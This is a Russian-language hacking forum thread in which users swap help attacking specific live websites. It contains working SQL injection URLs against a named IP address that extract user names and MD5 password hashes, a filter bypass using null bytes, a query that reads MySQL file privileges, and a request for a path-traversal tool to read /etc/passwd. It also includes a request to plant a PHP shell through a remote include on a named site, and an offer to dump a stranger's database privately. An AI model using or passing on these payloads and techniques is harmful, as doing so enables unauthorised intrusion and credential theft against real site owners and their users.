Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    Есть. Без особых даже проблем. Кури маны.
    Искать логин в другой таблице как вариант. id же тебе известен.
     
    _________________________
  2. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    Помоему там ограничение на длину запроса. потому и не получается ничего)
     
  3. Konfuz™

    Konfuz™ New Member

    Joined:
    19 May 2010
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Есть SQL Injection

    http://95.215.1.82/stat.php?id=' AND '0' OR 1 GROUP BY CONCAT((SELECT `name` FROM `users` LIMIT 0,1),RAND(0)|0) HAVING MIN(0)--

    Меняем LIMIT 0,1 - получаем 158 пользователей...

    http://95.215.1.82/stat.php?id=' AND '0' OR 1 GROUP BY CONCAT((SELECT `pass` FROM `users` LIMIT 0,1),RAND(0)|0) HAVING MIN(0)--

    Первые 3 пользователя выводит md5 пароль, остальные нет... В чем может быть беда?
     
  4. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    http://95.215.1.82/stat.php?id=' and '0' or 1 group by concat((select count(pass) from users),rand(0)|0) having sum(0)-- 1
     
  5. Konfuz™

    Konfuz™ New Member

    Joined:
    19 May 2010
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    я уже увидел что всего 3 пароля, как такое может быть?
    Какие есть варианты? Пароли лежат где-то еще?
     
  6. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    Колонке не присвоено not null при создании. Следовательно, они могут быть пустыми.
     
    #16466 ~d0s~, 23 Mar 2011
    Last edited by a moderator: 24 Mar 2011
  7. DCrypt

    DCrypt Banned

    Joined:
    21 Jan 2010
    Messages:
    367
    Likes Received:
    35
    Reputations:
    1
    Есть вот такие штуки:

    PHP:
    Warning: include(service.php\') [function.include]: failed to open stream: No such file or directory in /home/corpxcoz/public_html/321.co.za/home.php on line 111
    -------
    Warning: include(templates/default/testimonials_browse.php\') [function.include]: failed to open stream: No such file or directory in /home/pmagic/public_html/helpdesk/index.php on line 82
    ----------------
    Warning: include(/homepages/12/d281576965/htdocs/Lucid IT/components/com_pro_desk/support/templates/default/knowledgebase_browse.php\') [function.include]: failed to open stream: No such file or directory in /homepages/12/d281576965/htdocs/Lucid IT/components/com_pro_desk/support/index.php on line 85
    И т.д.
    Подкинье брутер etc/passwd, passwd%00, который перебирает пути ../, ../../, ../../../ и т.д на валид.
    Желательно на перле или питоне. Спасибо.
     
  8. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    Посчитай кол-во каталогов от корня до исходного файла исходя из ошибки.
     
    #16468 ~d0s~, 23 Mar 2011
    Last edited by a moderator: 24 Mar 2011
    1 person likes this.
  9. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Не пропускает запросы, где есть union select from. Просто union select - все норм, при добавление from - еррор. /*!union*/ /*!select*/ /*!from*/ не прокатило /*!union+select*/ from тоже. Изменение регистров не вариант. Есть какие-нибудь предложения?

    Проблема решена.
    Обошел так:
    uni%00on sele%00ct from
     
    #16469 Tigger, 23 Mar 2011
    Last edited: 23 Mar 2011
  10. Oro4imaru

    Oro4imaru New Member

    Joined:
    17 Jul 2010
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    не могу найти логин админа в панель в базах нет, автор новостей скрыт, на сайте не нашел ?????
     
  11. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    ну как бы не всегда логин с паролем в базе есть
     
  12. Oro4imaru

    Oro4imaru New Member

    Joined:
    17 Jul 2010
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    ну да я понимаю подскажите куда дальше рыть
     
  13. DCrypt

    DCrypt Banned

    Joined:
    21 Jan 2010
    Messages:
    367
    Likes Received:
    35
    Reputations:
    1
    Кидай в личку скуль (или что у тебя там), выдру.
     
  14. Dyxxx

    Dyxxx Elder - Старейшина

    Joined:
    16 Feb 2009
    Messages:
    107
    Likes Received:
    155
    Reputations:
    24
    парни проблемка
    обычная скуль но точку юзать нельзя
    возможно обратиться к information_schema.columns например?
     
  15. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    http://forum.antichat.ru/showpost.php?p=497033&postcount=10 // два запроса с одним параметром
    http://forum.antichat.ru/showpost.php?p=1047515&postcount=48 // все вместе
     
  16. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    Античатопедия продолжается
    id=-1+UNION+SELECT+File_Priv+from+mysql.user+where+user='юзер'
     
  17. Compton

    Compton Member

    Joined:
    31 Jan 2010
    Messages:
    290
    Likes Received:
    25
    Reputations:
    0
    помогите залить шелл пхп инъекция
    Code:
    http://www.uwua375.org/?page=http://google.ru
    
     
  18. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    Это фрейм=\
     
    1 person likes this.
  19. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    file('dir/'.$.'.ext'); годится только для локального "инклуда"? расширение нолем отсекаю, конфиг читаю, но чую что шелом тут не пахнет. поправьте меня если я не прав.
     
  20. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Это вообще не инклуд, это читалка :eek:
    Читать файлы можешь, но подключать не можешь.
    Так то вот.
     
    #16480 SeNaP, 24 Mar 2011
    Last edited: 24 Mar 2011
    1 person likes this.
Thread Status:
Not open for further replies.